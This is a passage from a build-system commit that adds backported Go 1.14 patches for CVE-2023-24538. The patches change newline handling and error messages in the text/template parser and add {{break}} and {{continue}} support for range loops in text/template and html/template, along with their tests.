+ func lexRightDelim(l *lexer) stateFn {
+-	trimSpace := strings.HasPrefix(l.input[l.pos:], rightTrimMarker)
++	trimSpace := hasRightTrimMarker(l.input[l.pos:])
+	if trimSpace {
+		l.pos += trimMarkerLen
+		l.ignore()
+@@ -369,7 +366,7 @@ func lexInsideAction(l *lexer) stateFn {
+		return l.errorf("unclosed left paren")
+	}
+	switch r := l.next(); {
+-	case r == eof || isEndOfLine(r):
++	case r == eof:
+		return l.errorf("unclosed action")
+	case isSpace(r):
+		l.backup() // Put space back in case we have " -}}".
+@@ -439,7 +436,7 @@ func lexSpace(l *lexer) stateFn {
+	}
+	// Be careful about a trim-marked closing delimiter, which has a minus
+	// after a space. We know there is a space, so check for the '-' that might follow.
+-	if strings.HasPrefix(l.input[l.pos-1:], l.trimRightDelim) {
++	if hasRightTrimMarker(l.input[l.pos-1:]) && strings.HasPrefix(l.input[l.pos-1+trimMarkerLen:], l.rightDelim) {
+		l.backup() // Before the space.
+		if numSpaces == 1 {
+			return lexRightDelim // On the delim, so go right to that.
+@@ -526,7 +523,7 @@ func lexFieldOrVariable(l *lexer, typ itemType) stateFn {
+ // day to implement arithmetic.
+ func (l *lexer) atTerminator() bool {
+	r := l.peek()
+-	if isSpace(r) || isEndOfLine(r) {
++	if isSpace(r) {
+		return true
+	}
+	switch r {
+@@ -657,15 +654,18 @@ Loop:
+
+ // isSpace reports whether r is a space character.
+ func isSpace(r rune) bool {
+-	return r == ' ' || r == '\t'
+-}
+-
+-// isEndOfLine reports whether r is an end-of-line character.
+-func isEndOfLine(r rune) bool {
+-	return r == '\r' || r == '\n'
++	return r == ' ' || r == '\t' || r == '\r' || r == '\n'
+ }
+
+ // isAlphaNumeric reports whether r is an alphabetic, digit, or underscore.
+ func isAlphaNumeric(r rune) bool {
+	return r == '_' || unicode.IsLetter(r) || unicode.IsDigit(r)
+ }
++
++func hasLeftTrimMarker(s string) bool {
++	return len(s) >= 2 && s[0] == trimMarker && isSpace(rune(s[1]))
++}
++
++func hasRightTrimMarker(s string) bool {
++	return len(s) >= 2 && isSpace(rune(s[0])) && s[1] == trimMarker
++}
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index f6d5f28..6510eed 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -323,7 +323,7 @@ var lexTests = []lexTest{
+		tLeft,
+		mkItem(itemError, "unrecognized character in action: U+0001"),
+	}},
+-	{"unclosed action", "{{\n}}", []item{
++	{"unclosed action", "{{", []item{
+		tLeft,
+		mkItem(itemError, "unclosed action"),
+	}},
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 496d8bf..5e6e512 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -24,13 +24,14 @@ type Tree struct {
+	Mode      Mode      // parsing mode.
+	text      string    // text parsed to create the template (or its parent)
+	// Parsing only; cleared after parse.
+-	funcs     []map[string]interface{}
+-	lex       *lexer
+-	token     [3]item // three-token lookahead for parser.
+-	peekCount int
+-	vars      []string // variables defined at the moment.
+-	treeSet   map[string]*Tree
+-	mode      Mode
++	funcs      []map[string]interface{}
++	lex        *lexer
++	token      [3]item // three-token lookahead for parser.
++	peekCount  int
++	vars       []string // variables defined at the moment.
++	treeSet    map[string]*Tree
++	actionLine int // line of left delim starting action
++	mode       Mode
+ }
+
+ // A mode value is a set of flags (or 0). Modes control parser behavior.
+@@ -187,6 +188,16 @@ func (t *Tree) expectOneOf(expected1, expected2 itemType, context string) item {
+
+ // unexpected complains about the token and terminates processing.
+ func (t *Tree) unexpected(token item, context string) {
++	if token.typ == itemError {
++		extra := ""
++		if t.actionLine != 0 && t.actionLine != token.line {
++			extra = fmt.Sprintf(" in action started at %s:%d", t.ParseName, t.actionLine)
++			if strings.HasSuffix(token.val, " action") {
++				extra = extra[len(" in action"):] // avoid "action in action"
++			}
++		}
++		t.errorf("%s%s", token, extra)
++	}
+	t.errorf("unexpected %s in %s", token, context)
+ }
+
+@@ -350,6 +361,8 @@ func (t *Tree) textOrAction() Node {
+	case itemText:
+		return t.newText(token.pos, token.val)
+	case itemLeftDelim:
++		t.actionLine = token.line
++		defer t.clearActionLine()
+		return t.action()
+	case itemComment:
+		return t.newComment(token.pos, token.val)
+@@ -359,6 +372,10 @@ func (t *Tree) textOrAction() Node {
+	return nil
+ }
+
++func (t *Tree) clearActionLine() {
++	t.actionLine = 0
++}
++
+ // Action:
+ //	control
+ //	command ("|" command)*
+@@ -384,12 +401,12 @@ func (t *Tree) action() (n Node) {
+	t.backup()
+	token := t.peek()
+	// Do not pop variables; they persist until "end".
+-	return t.newAction(token.pos, token.line, t.pipeline("command"))
++	return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
+ // Pipeline:
+ //	declarations? command ('|' command)*
+-func (t *Tree) pipeline(context string) (pipe *PipeNode) {
++func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+	token := t.peekNonSpace()
+	pipe = t.newPipeline(token.pos, token.line, nil)
+	// Are there declarations or assignments?
+@@ -430,12 +447,9 @@ decls:
+	}
+	for {
+		switch token := t.nextNonSpace(); token.typ {
+-		case itemRightDelim, itemRightParen:
++		case end:
+			// At this point, the pipeline is complete
+			t.checkPipeline(pipe, context)
+-			if token.typ == itemRightParen {
+-				t.backup()
+-			}
+			return
+		case itemBool, itemCharConstant, itemComplex, itemDot, itemField, itemIdentifier,
+			itemNumber, itemNil, itemRawString, itemString, itemVariable, itemLeftParen:
+@@ -464,7 +478,7 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+	defer t.popVars(len(t.vars))
+-	pipe = t.pipeline(context)
++	pipe = t.pipeline(context, itemRightDelim)
+	var next Node
+	list, next = t.itemList()
+	switch next.Type() {
+@@ -550,7 +564,7 @@ func (t *Tree) blockControl() Node {
+
+	token := t.nextNonSpace()
+	name := t.parseTemplateName(token, context)
+-	pipe := t.pipeline(context)
++	pipe := t.pipeline(context, itemRightDelim)
+
+	block := New(name) // name will be updated once we know it.
+	block.text = t.text
+@@ -580,7 +594,7 @@ func (t *Tree) templateControl() Node {
+	if t.nextNonSpace().typ != itemRightDelim {
+		t.backup()
+		// Do not pop variables; they persist until "end".
+-		pipe = t.pipeline(context)
++		pipe = t.pipeline(context, itemRightDelim)
+	}
+	return t.newTemplate(token.pos, token.line, name, pipe)
+ }
+@@ -614,13 +628,12 @@ func (t *Tree) command() *CommandNode {
+		switch token := t.next(); token.typ {
+		case itemSpace:
+			continue
+-		case itemError:
+-			t.errorf("%s", token.val)
+		case itemRightDelim, itemRightParen:
+			t.backup()
+		case itemPipe:
++			// nothing here; break loop below
+		default:
+-			t.errorf("unexpected %s in operand", token)
++			t.unexpected(token, "operand")
+		}
+		break
+	}
+@@ -675,8 +688,6 @@ func (t *Tree) operand() Node {
+ // A nil return means the next item is not a term.
+ func (t *Tree) term() Node {
+	switch token := t.nextNonSpace(); token.typ {
+-	case itemError:
+-		t.errorf("%s", token.val)
+	case itemIdentifier:
+		if !t.hasFunction(token.val) {
+			t.errorf("function %q not defined", token.val)
+@@ -699,11 +710,7 @@ func (t *Tree) term() Node {
+		}
+		return number
+	case itemLeftParen:
+-		pipe := t.pipeline("parenthesized pipeline")
+-		if token := t.next(); token.typ != itemRightParen {
+-			t.errorf("unclosed right paren: unexpected %s", token)
+-		}
+-		return pipe
++		return t.pipeline("parenthesized pipeline", itemRightParen)
+	case itemString, itemRawString:
+		s, err := strconv.Unquote(token.val)
+		if err != nil {
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index d9c13c5..220f984 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -250,6 +250,13 @@ var parseTests = []parseTest{
+	{"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x""y"`},
+	{"block definition", `{{block "foo" .}}hello{{end}}`, noError,
+		`{{template "foo" .}}`},
++
++	{"newline in assignment", "{{ $x \n := \n 1 \n }}", noError, "{{$x := 1}}"},
++	{"newline in empty action", "{{\n}}", hasError, "{{\n}}"},
++	{"newline in pipeline", "{{\n\"x\"\n|\nprintf\n}}", noError, `{{"x" | printf}}`},
++	{"newline in comment", "{{/*\nhello\n*/}}", noError, ""},
++	{"newline in comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},
++
+	// Errors.
+	{"unclosed action", "hello{{range", hasError, ""},
+	{"unmatched end", "{{end}}", hasError, ""},
+@@ -426,23 +433,38 @@ var errorTests = []parseTest{
+	// Check line numbers are accurate.
+	{"unclosed1",
+		"line1\n{{",
+-		hasError, `unclosed1:2: unexpected unclosed action in command`},
++		hasError, `unclosed1:2: unclosed action`},
+	{"unclosed2",
+		"line1\n{{define `x`}}line2\n{{",
+-		hasError, `unclosed2:3: unexpected unclosed action in command`},
++		hasError, `unclosed2:3: unclosed action`},
++	{"unclosed3",
++		"line1\n{{\"x\"\n\"y\"\n",
++		hasError, `unclosed3:4: unclosed action started at unclosed3:2`},
++	{"unclosed4",
++		"{{\n\n\n\n\n",
++		hasError, `unclosed4:6: unclosed action started at unclosed4:1`},
++	{"var1",
++		"line1\n{{\nx\n}}",
++		hasError, `var1:3: function "x" not defined`},
+	// Specific errors.
+	{"function",
+		"{{foo}}",
+		hasError, `function "foo" not defined`},
+-	{"comment",
++	{"comment1",
+		"{{/*}}",
+-		hasError, `unclosed comment`},
++		hasError, `comment1:1: unclosed comment`},
++	{"comment2",
++		"{{/*\nhello\n}}",
++		hasError, `comment2:1: unclosed comment`},
+	{"lparen",
+		"{{.X (1 2 3}}",
+		hasError, `unclosed left paren`},
+	{"rparen",
+-		"{{.X 1 2 3)}}",
+-		hasError, `unexpected ")"`},
++		"{{.X 1 2 3 ) }}",
++		hasError, `unexpected ")" in command`},
++	{"rparen2",
++		"{{(.X 1 2 3",
++		hasError, `unclosed action`},
+	{"space",
+		"{{`x`3}}",
+		hasError, `in operand`},
+@@ -488,7 +510,7 @@ var errorTests = []parseTest{
+		hasError, `missing value for parenthesized pipeline`},
+	{"multilinerawstring",
+		"{{ $v := `\n` }} {{",
+-		hasError, `multilinerawstring:2: unexpected unclosed action`},
++		hasError, `multilinerawstring:2: unclosed action`},
+	{"rangeundefvar",
+		"{{range $k}}{{end}}",
+		hasError, `undefined variable`},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
new file mode 100644
index 0000000000..fc38929648
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
@@ -0,0 +1,585 @@
+From e0e6bca6ddc0e6d9fa3a5b644af9b446924fbf83 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 20 May 2021 12:46:33 -0400
+Subject: [PATCH 5/6] html/template, text/template: implement break and
+ continue for range loops
+
+Break and continue for range loops was accepted as a proposal in June 2017.
+It was implemented in CL 66410 (Oct 2017)
+but then rolled back in CL 92155 (Feb 2018)
+because html/template changes had not been implemented.
+
+This CL reimplements break and continue in text/template
+and then adds support for them in html/template as well.
+
+Fixes #20531.
+
+Change-Id: I05330482a976f1c078b4b49c2287bd9031bb7616
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321491
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #5
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d0dd26a88c019d54f22463daae81e785f5867565
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go          |  4 ++
+ src/html/template/escape.go           | 71 ++++++++++++++++++++++++++++++++++-
+ src/html/template/escape_test.go      | 24 ++++++++++++
+ src/text/template/doc.go              |  8 ++++
+ src/text/template/exec.go             | 24 +++++++++++-
+ src/text/template/exec_test.go        |  2 +
+ src/text/template/parse/lex.go        | 13 ++++++-
+ src/text/template/parse/lex_test.go   |  2 +
+ src/text/template/parse/node.go       | 36 ++++++++++++++++++
+ src/text/template/parse/parse.go      | 42 ++++++++++++++++++++-
+ src/text/template/parse/parse_test.go |  8 ++++
+ 11 files changed, 230 insertions(+), 4 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..aaa7d08 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -6,6 +6,7 @@ package template
+
+ import (
+	"fmt"
++	"text/template/parse"
+ )
+
+ // context describes the state an HTML parser must be in when it reaches the
+@@ -22,6 +23,7 @@ type context struct {
+	jsCtx   jsCtx
+	attr    attr
+	element element
++	n       parse.Node // for range break/continue
+	err     *Error
+ }
+
+@@ -141,6 +143,8 @@ const (
+	// stateError is an infectious error state outside any valid
+	// HTML/CSS/JS construct.
+	stateError
++	// stateDead marks unreachable code after a {{break}} or {{continue}}.
++	stateDead
+ )
+
+ // isComment is true for any state that contains content meant for template
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 8739735..6dea79c 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -97,6 +97,15 @@ type escaper struct {
+	actionNodeEdits   map[*parse.ActionNode][]string
+	templateNodeEdits map[*parse.TemplateNode]string
+	textNodeEdits     map[*parse.TextNode][]byte
++	// rangeContext holds context about the current range loop.
++	rangeContext *rangeContext
++}
++
++// rangeContext holds information about the current range loop.
++type rangeContext struct {
++	outer     *rangeContext // outer loop
++	breaks    []context     // context at each break action
++	continues []context     // context at each continue action
+ }
+
+ // makeEscaper creates a blank escaper for the given set.
+@@ -109,6 +118,7 @@ func makeEscaper(n *nameSpace) escaper {
+		map[*parse.ActionNode][]string{},
+		map[*parse.TemplateNode]string{},
+		map[*parse.TextNode][]byte{},
++		nil,
+	}
+ }
+
+@@ -124,8 +134,16 @@ func (e *escaper) escape(c context, n parse.Node) context {
+	switch n := n.(type) {
+	case *parse.ActionNode:
+		return e.escapeAction(c, n)
++	case *parse.BreakNode:
++		c.n = n
++		e.rangeContext.breaks = append(e.rangeContext.breaks, c)
++		return context{state: stateDead}
+	case *parse.CommentNode:
+		return c
++	case *parse.ContinueNode:
++		c.n = n
++		e.rangeContext.continues = append(e.rangeContext.breaks, c)
++		return context{state: stateDead}
+	case *parse.IfNode:
+		return e.escapeBranch(c, &n.BranchNode, "if")
+	case *parse.ListNode:
+@@ -427,6 +445,12 @@ func join(a, b context, node parse.Node, nodeName string) context {
+	if b.state == stateError {
+		return b
+	}
++	if a.state == stateDead {
++		return b
++	}
++	if b.state == stateDead {
++		return a
++	}
+	if a.eq(b) {
+		return a
+	}
+@@ -466,14 +490,27 @@ func join(a, b context, node parse.Node, nodeName string) context {
+
+ // escapeBranch escapes a branch template node: "if", "range" and "with".
+ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string) context {
++	if nodeName == "range" {
++		e.rangeContext = &rangeContext{outer: e.rangeContext}
++	}
+	c0 := e.escapeList(c, n.List)
+-	if nodeName == "range" && c0.state != stateError {
++	if nodeName == "range" {
++		if c0.state != stateError {
++			c0 = joinRange(c0, e.rangeContext)
++		}
++		e.rangeContext = e.rangeContext.outer
++		if c0.state == stateError {
++			return c0
++		}
++
+		// The "true" branch of a "range" node can execute multiple times.
+		// We check that executing n.List once results in the same context
+		// as executing n.List twice.
++		e.rangeContext = &rangeContext{outer: e.rangeContext}
+		c1, _ := e.escapeListConditionally(c0, n.List, nil)
+		c0 = join(c0, c1, n, nodeName)
+		if c0.state == stateError {
++			e.rangeContext = e.rangeContext.outer
+			// Make clear that this is a problem on loop re-entry
+			// since developers tend to overlook that branch when
+			// debugging templates.
+@@ -481,11 +518,39 @@ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string)
+			c0.err.Description = "on range loop re-entry: " + c0.err.Description
+			return c0
+		}
++		c0 = joinRange(c0, e.rangeContext)
++		e.rangeContext = e.rangeContext.outer
++		if c0.state == stateError {
++			return c0
++		}
+	}
+	c1 := e.escapeList(c, n.ElseList)
+	return join(c0, c1, n, nodeName)
+ }
+
++func joinRange(c0 context, rc *rangeContext) context {
++	// Merge contexts at break and continue statements into overall body context.
++	// In theory we could treat breaks differently from continues, but for now it is
++	// enough to treat them both as going back to the start of the loop (which may then stop).
++	for _, c := range rc.breaks {
++		c0 = join(c0, c, c.n, "range")
++		if c0.state == stateError {
++			c0.err.Line = c.n.(*parse.BreakNode).Line
++			c0.err.Description = "at range loop break: " + c0.err.Description
++			return c0
++		}
++	}
++	for _, c := range rc.continues {
++		c0 = join(c0, c, c.n, "range")
++		if c0.state == stateError {
++			c0.err.Line = c.n.(*parse.ContinueNode).Line
++			c0.err.Description = "at range loop continue: " + c0.err.Description
++			return c0
++		}
++	}
++	return c0
++}
++
+ // escapeList escapes a list template node.
+ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+	if n == nil {
+@@ -493,6 +558,9 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+	}
+	for _, m := range n.Nodes {
+		c = e.escape(c, m)
++		if c.state == stateDead {
++			break
++		}
+	}
+	return c
+ }
+@@ -503,6 +571,7 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ // which is the same as whether e was updated.
+ func (e *escaper) escapeListConditionally(c context, n *parse.ListNode, filter func(*escaper, context) bool) (context, bool) {
+	e1 := makeEscaper(e.ns)
++	e1.rangeContext = e.rangeContext
+	// Make type inferences available to f.
+	for k, v := range e.output {
+		e1.output[k] = v
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index c709660..fa2b84a 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -920,6 +920,22 @@ func TestErrors(t *testing.T) {
+			"<a href='/foo?{{range .Items}}&{{.K}}={{.V}}{{end}}'>",
+			"",
+		},
++		{
++			"{{range .Items}}<a{{if .X}}{{end}}>{{end}}",
++			"",
++		},
++		{
++			"{{range .Items}}<a{{if .X}}{{end}}>{{continue}}{{end}}",
++			"",
++		},
++		{
++			"{{range .Items}}<a{{if .X}}{{end}}>{{break}}{{end}}",
++			"",
++		},
++		{
++			"{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
++			"",
++		},
+		// Error cases.
+		{
+			"{{if .Cond}}<a{{end}}",
+@@ -956,6 +972,14 @@ func TestErrors(t *testing.T) {
+			"z:2:8: on range loop re-entry: {{range}} branches",
+		},
+		{
++			"{{range .Items}}<a{{if .X}}{{break}}{{end}}>{{end}}",
++			"z:1:29: at range loop break: {{range}} branches end in different contexts",
++		},
++		{
++			"{{range .Items}}<a{{if .X}}{{continue}}{{end}}>{{end}}",
++			"z:1:29: at range loop continue: {{range}} branches end in different contexts",
++		},
++		{
+			"<a b=1 c={{.H}}",
+			"z: ends in a non-text context: {stateAttr delimSpaceOrTagEnd",
+		},
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 7b30294..0228b15 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -112,6 +112,14 @@ data, defined in detail in the corresponding sections that follow.
+		T0 is executed; otherwise, dot is set to the successive elements
+		of the array, slice, or map and T1 is executed.
+
++	{{break}}
++		The innermost {{range pipeline}} loop is ended early, stopping the
++		current iteration and bypassing all remaining iterations.
++
++	{{continue}}
++		The current iteration of the innermost {{range pipeline}} loop is
++		stopped, and the loop starts the next iteration.
++
+	{{template "name"}}
+		The template with the specified name is executed with nil data.
+
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index 7ac5175..6cb140a 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++	"errors"
+	"fmt"
+	"internal/fmtsort"
+	"io"
+@@ -244,6 +245,12 @@ func (t *Template) DefinedTemplates() string {
+	return b.String()
+ }
+
++// Sentinel errors for use with panic to signal early exits from range loops.
++var (
++	walkBreak    = errors.New("break")
++	walkContinue = errors.New("continue")
++)
++
+ // Walk functions step through the major pieces of the template structure,
+ // generating output as they go.
+ func (s *state) walk(dot reflect.Value, node parse.Node) {
+@@ -256,7 +263,11 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+		if len(node.Pipe.Decl) == 0 {
+			s.printValue(node, val)
+		}
++	case *parse.BreakNode:
++		panic(walkBreak)
+	case *parse.CommentNode:
++	case *parse.ContinueNode:
++		panic(walkContinue)
+	case *parse.IfNode:
+		s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+	case *parse.ListNode:
+@@ -335,6 +346,11 @@ func isTrue(val reflect.Value) (truth, ok bool) {
+
+ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+	s.at(r)
++	defer func() {
++		if r := recover(); r != nil && r != walkBreak {
++			panic(r)
++		}
++	}()
+	defer s.pop(s.mark())
+	val, _ := indirect(s.evalPipeline(dot, r.Pipe))
+	// mark top of stack before any variables in the body are pushed.
+@@ -348,8 +364,14 @@ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+		if len(r.Pipe.Decl) > 1 {
+			s.setTopVar(2, index)
+		}
++		defer s.pop(mark)
++		defer func() {
++			// Consume panic(walkContinue)
++			if r := recover(); r != nil && r != walkContinue {
++				panic(r)
++			}
++		}()
+		s.walk(elem, r.List)
+-		s.pop(mark)
+	}
+	switch val.Kind() {
+	case reflect.Array, reflect.Slice:
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 3309b33..a639f44 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -563,6 +563,8 @@ var execTests = []execTest{
+	{"range empty no else", "{{range .SIEmpty}}-{{.}}-{{end}}", "", tVal, true},
+	{"range []int else", "{{range .SI}}-{{.}}-{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+	{"range empty else", "{{range .SIEmpty}}-{{.}}-{{else}}EMPTY{{end}}", "EMPTY", tVal, true},
++	{"range []int break else", "{{range .SI}}-{{.}}-{{break}}NOTREACHED{{else}}EMPTY{{end}}", "-3-", tVal, true},
++	{"range []int continue else", "{{range .SI}}-{{.}}-{{continue}}NOTREACHED{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+	{"range []bool", "{{range .SB}}-{{.}}-{{end}}", "-true--false-", tVal, true},
+	{"range []int method", "{{range .SI | .MAdd .I}}-{{.}}-{{end}}", "-20--21--22-", tVal, true},
+	{"range map", "{{range .MSI}}-{{.}}-{{end}}", "-1--3--2-", tVal, true},
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 6784071..95e3377 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -62,6 +62,8 @@ const (
+	// Keywords appear after all the rest.
+	itemKeyword  // used only to delimit the keywords
+	itemBlock    // block keyword
++	itemBreak    // break keyword
++	itemContinue // continue keyword
+	itemDot      // the cursor, spelled '.'
+	itemDefine   // define keyword
+	itemElse     // else keyword
+@@ -76,6 +78,8 @@ const (
+ var key = map[string]itemType{
+	".":        itemDot,
+	"block":    itemBlock,
++	"break":    itemBreak,
++	"continue": itemContinue,
+	"define":   itemDefine,
+	"else":     itemElse,
+	"end":      itemEnd,
+@@ -119,6 +123,8 @@ type lexer struct {
+	parenDepth  int       // nesting depth of ( ) exprs
+	line        int       // 1+number of newlines seen
+	startLine   int       // start line of this item
++	breakOK     bool      // break keyword allowed
++	continueOK  bool      // continue keyword allowed
+ }
+
+ // next returns the next rune in the input.
+@@ -461,7 +467,12 @@ Loop:
+			}
+			switch {
+			case key[word] > itemKeyword:
+-				l.emit(key[word])
++				item := key[word]
++				if item == itemBreak && !l.breakOK || item == itemContinue && !l.continueOK {
++					l.emit(itemIdentifier)
++				} else {
++					l.emit(item)
++				}
+			case word[0] == '.':
+				l.emit(itemField)
+			case word == "true", word == "false":
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 6510eed..df6aabf 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -35,6 +35,8 @@ var itemName = map[itemType]string{
+	// keywords
+	itemDot:      ".",
+	itemBlock:    "block",
++	itemBreak:    "break",
++	itemContinue: "continue",
+	itemDefine:   "define",
+	itemElse:     "else",
+	itemIf:       "if",
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index a9dad5e..c398da0 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -71,6 +71,8 @@ const (
+	NodeVariable                   // A $ variable.
+	NodeWith                       // A with action.
+	NodeComment                    // A comment.
++	NodeBreak                      // A break action.
++	NodeContinue                   // A continue action.
+ )
+
+ // Nodes.
+@@ -907,6 +909,40 @@ func (i *IfNode) Copy() Node {
+	return i.tr.newIf(i.Pos, i.Line, i.Pipe.CopyPipe(), i.List.CopyList(), i.ElseList.CopyList())
+ }
+
++// BreakNode represents a {{break}} action.
++type BreakNode struct {
++	tr *Tree
++	NodeType
++	Pos
++	Line int
++}
++
++func (t *Tree) newBreak(pos Pos, line int) *BreakNode {
++	return &BreakNode{tr: t, NodeType: NodeBreak, Pos: pos, Line: line}
++}
++
++func (b *BreakNode) Copy() Node                  { return b.tr.newBreak(b.Pos, b.Line) }
++func (b *BreakNode) String() string              { return "{{break}}" }
++func (b *BreakNode) tree() *Tree                 { return b.tr }
++func (b *BreakNode) writeTo(sb *strings.Builder) { sb.WriteString("{{break}}") }
++
++// ContinueNode represents a {{continue}} action.
++type ContinueNode struct {
++	tr *Tree
++	NodeType
++	Pos
++	Line int
++}
++
++func (t *Tree) newContinue(pos Pos, line int) *ContinueNode {
++	return &ContinueNode{tr: t, NodeType: NodeContinue, Pos: pos, Line: line}
++}
++
++func (c *ContinueNode) Copy() Node                  { return c.tr.newContinue(c.Pos, c.Line) }
++func (c *ContinueNode) String() string              { return "{{continue}}" }
++func (c *ContinueNode) tree() *Tree                 { return c.tr }
++func (c *ContinueNode) writeTo(sb *strings.Builder) { sb.WriteString("{{continue}}") }
++
+ // RangeNode represents a {{range}} action and its commands.
+ type RangeNode struct {
+	BranchNode
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 5e6e512..7f78b56 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -31,6 +31,7 @@ type Tree struct {
+	vars       []string // variables defined at the moment.
+	treeSet    map[string]*Tree
+	actionLine int // line of left delim starting action
++	rangeDepth int
+	mode       Mode
+ }
+
+@@ -223,6 +224,8 @@ func (t *Tree) startParse(funcs []map[string]interface{}, lex *lexer, treeSet ma
+	t.vars = []string{"$"}
+	t.funcs = funcs
+	t.treeSet = treeSet
++	lex.breakOK = !t.hasFunction("break")
++	lex.continueOK = !t.hasFunction("continue")
+ }
+
+ // stopParse terminates parsing.
+@@ -385,6 +388,10 @@ func (t *Tree) action() (n Node) {
+	switch token := t.nextNonSpace(); token.typ {
+	case itemBlock:
+		return t.blockControl()
++	case itemBreak:
++		return t.breakControl(token.pos, token.line)
++	case itemContinue:
++		return t.continueControl(token.pos, token.line)
+	case itemElse:
+		return t.elseControl()
+	case itemEnd:
+@@ -404,6 +411,32 @@ func (t *Tree) action() (n Node) {
+	return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
++// Break:
++//	{{break}}
++// Break keyword is past.
++func (t *Tree) breakControl(pos Pos, line int) Node {
++	if token := t.next(); token.typ != itemRightDelim {
++		t.unexpected(token, "in {{break}}")
++	}
++	if t.rangeDepth == 0 {
++		t.errorf("{{break}} outside {{range}}")
++	}
++	return t.newBreak(pos, line)
++}
++
++// Continue:
++//	{{continue}}
++// Continue keyword is past.
++func (t *Tree) continueControl(pos Pos, line int) Node {
++	if token := t.next(); token.typ != itemRightDelim {
++		t.unexpected(token, "in {{continue}}")
++	}
++	if t.rangeDepth == 0 {
++		t.errorf("{{continue}} outside {{range}}")
++	}
++	return t.newContinue(pos, line)
++}
++
+ // Pipeline:
+ //	declarations? command ('|' command)*
+ func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+@@ -479,8 +512,14 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+	defer t.popVars(len(t.vars))
+	pipe = t.pipeline(context, itemRightDelim)
++	if context == "range" {
++		t.rangeDepth++
++	}
+	var next Node
+	list, next = t.itemList()
++	if context == "range" {
++		t.rangeDepth--
++	}
+	switch next.Type() {
+	case nodeEnd: //done
+	case nodeElse:
+@@ -522,7 +561,8 @@ func (t *Tree) ifControl() Node {
+ //	{{range pipeline}} itemList {{else}} itemList {{end}}
+ // Range keyword is past.
+ func (t *Tree) rangeControl() Node {
+-	return t.newRange(t.parseControl(false, "range"))
++	r := t.newRange(t.parseControl(false, "range"))
++	return r
+ }
+
+ // With:
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 220f984..ba45636 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -230,6 +230,10 @@ var parseTests = []parseTest{
+		`{{range $x := .SI}}{{.}}{{end}}`},
+	{"range 2 vars", "{{range $x, $y := .SI}}{{.}}{{end}}", noError,
+		`{{range $x, $y := .SI}}{{.}}{{end}}`},
